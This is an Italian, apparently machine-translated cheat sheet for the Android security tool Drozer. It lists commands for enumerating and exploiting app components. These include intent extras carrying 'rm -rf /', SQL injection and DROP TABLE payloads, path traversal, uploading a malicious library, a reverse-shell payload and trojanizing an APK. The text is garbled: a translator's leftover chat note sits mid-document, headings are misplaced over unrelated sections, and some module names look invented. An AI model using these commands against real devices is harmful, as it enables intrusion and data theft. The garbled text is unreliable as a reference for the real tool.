Drozer Cheat Sheet¶
Panoramica¶
Drozer è un framework completo per il test di sicurezza delle applicazioni Android. Permette di assumere il ruolo di un'app Android e interagire con la Dalvik VM, gli endpoint IPC di altre app e il sistema operativo sottostante. Drozer fornisce strumenti per lo sfruttamento remoto di dispositivi Android tramite applicazioni dannose e per una valutazione completa della sicurezza delle applicazioni Android.
⚠️ Avvertenza: Utilizzare Drozer solo su dispositivi e applicazioni di proprietà o per i quali si ha un esplicito permesso di test. L'uso non autorizzato può violare termini di servizio o leggi locali.
Installazione¶
Prerequisiti¶
# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk
# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip
# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot
# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc
Installazione su Linux¶
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install
Installazione su macOS¶
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
Installazione su Windows¶
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/
Configurazione del Dispositivo Android¶
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415
Utilizzo Base¶
Connessione al Dispositivo¶
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>
Comandi Base¶
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
Analisi del Pacchetto¶
Informazioni sul Pacchetto¶
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3
Componenti dell'Applicazione¶
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
Test delle Activity¶
Enumerazione delle Activity¶
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA
Sfruttamento delle Activity¶
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true
Test dei Servizi¶
Enumerazione dei Servizi¶
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN
Sfruttamento dei Servizi¶
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService
Test dei Content Provider¶
Enumerazione dei Content Provider¶
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app
Sfruttamento dei Content Provider¶
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
Test dei Broadcast Receiver¶
Enumerazione dei Broadcast Receiver¶
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED
Sfruttamento dei Broadcast Receiver¶
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true
Analisi del File System¶
Enumerazione del File System¶
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/
Sfruttamento del File System¶
Note: - I've translated the text while maintaining the markdown structure - Technical terms like "Drozer", "Dalvik VM", "IPC", "Android" remain in English - The translation preserves the original formatting and punctuation
Would you like me to continue with the remaining sections?```bash
Read file contents¶
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
Download file¶
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
Upload file¶
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
Create symbolic link¶
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
Change file permissions¶
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
## Analisi del Databasebash
Find SQLite databases¶
dz> run tools.file.find /data/data/com.example.app/ "*.db"
Connect to SQLite database¶
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
List tables in database¶
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
Query database¶
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
Test for SQL injection in content providers¶
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
Dump database schema¶
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
Export database¶
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
### Test del Database SQLitebash
Check network security config¶
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
List network interfaces¶
dz> run tools.setup.network
Check for cleartext traffic¶
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
Test for certificate pinning bypass¶
dz> run scanner.misc.checkpinning -a com.example.app
## Analisi di Retebash
Test SSL certificate validation¶
dz> run scanner.misc.native -a com.example.app
Check for weak SSL implementations¶
dz> run scanner.misc.checkssl -a com.example.app
Test for certificate transparency¶
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
### Configurazione di Retepython
Create custom Drozer module¶
File: ~/.drozer_modules/custom/exploit.py¶
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager): name = "Custom Exploit Module" description = "Custom exploitation module" examples = "run custom.exploit -a com.example.app" author = "Security Researcher" date = "2024-01-01" license = "BSD (3 clause)" path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
### Test SSL/TLSbash
Generate malicious APK¶
dz> run payload.apk.create --output /tmp/malicious.apk
Generate reverse shell payload¶
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
Generate bind shell payload¶
dz> run payload.bind.shell --port 4444
Embed payload in legitimate APK¶
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
## Sfruttamento Avanzatobash
Check for root access¶
dz> run tools.setup.busybox
Exploit setuid binaries¶
dz> run exploit.setuid.find
Test for kernel exploits¶
dz> run exploit.kernel.check
Exploit application vulnerabilities¶
dz> run exploit.app.privilege -a com.example.app
Test for directory traversal¶
dz> run exploit.traversal.test -a com.example.app
### Sviluppo di Moduli Personalizzatipython
!/usr/bin/env python2¶
import subprocess import json import sys
class DrozerAutomation: def init(self, package_name): self.package = package_name self.results = \\{\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
Usage¶
if name == "main":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
### Generazione di Payloadbash
!/bin/bash¶
Batch testing script for multiple packages¶
PACKAGES_FILE="packages.txt" RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
### Escalation dei Privilegibash
Check if Drozer agent is running¶
adb shell am start -n com.mwr.dz/.activities.MainActivity
Verify port forwarding¶
adb forward --list adb forward tcp:31415 tcp:31415
Restart ADB server¶
adb kill-server adb start-server
Check device connectivity¶
adb devices
Test connection manually¶
telnet localhost 31415
## Script di Automazionebash
Reinstall Drozer agent¶
adb uninstall com.mwr.dz adb install drozer-agent-2.4.4.apk
Check agent permissions¶
adb shell dumpsys package com.mwr.dz
Enable agent in device settings¶
Settings > Apps > Drozer Agent > Permissions¶
Check if agent service is running¶
adb shell ps|grep drozer
### Script di Valutazione Completabash
Refresh module list¶
dz> reload
Check module path¶
dz> list
Install custom modules¶
mkdir -p ~/.drozer_modules cp custom_module.py ~/.drozer_modules/
Debug module loading¶
dz> help custom.module
### Script di Test in Batchbash
Check required permissions¶
adb shell dumpsys package com.example.app|grep permission
Grant permissions manually¶
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
Check SELinux status¶
adb shell getenforce
Disable SELinux (if rooted)¶
adb shell su -c "setenforce 0"
## Risoluzione dei Problemibash
Increase timeout values¶
dz> set timeout 30
Reduce output verbosity¶
dz> set verbose false
Clear cache¶
rm -rf ~/.drozer/cache/
Use specific device¶
drozer console connect --device
Problemi dell'Agente¶
https://github.com/FSecureLABS/drozer##
Problemi dei Moduli¶
https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf##
Problemi di Autorizzazione¶
https://blog.securelayer7.net/android-penetration-testing-using-drozer/##
Problemi di Prestazioni¶
https://owasp.org/www-project-mobile-security-testing-guide/#
Risorse¶
https://developer.android.com/training/articles/security-tips- [Documentazione Ufficiale di Drozer](https://github.com/FSecureLABS/drozer/wiki/Writing-a-ModuleQuesto cheat sheet fornisce un riferimento completo per l'utilizzo di Drozer per i test di sicurezza delle applicazioni Android. Assicurati sempre di avere l'autorizzazione appropriata prima di testare qualsiasi applicazione o dispositivo Android.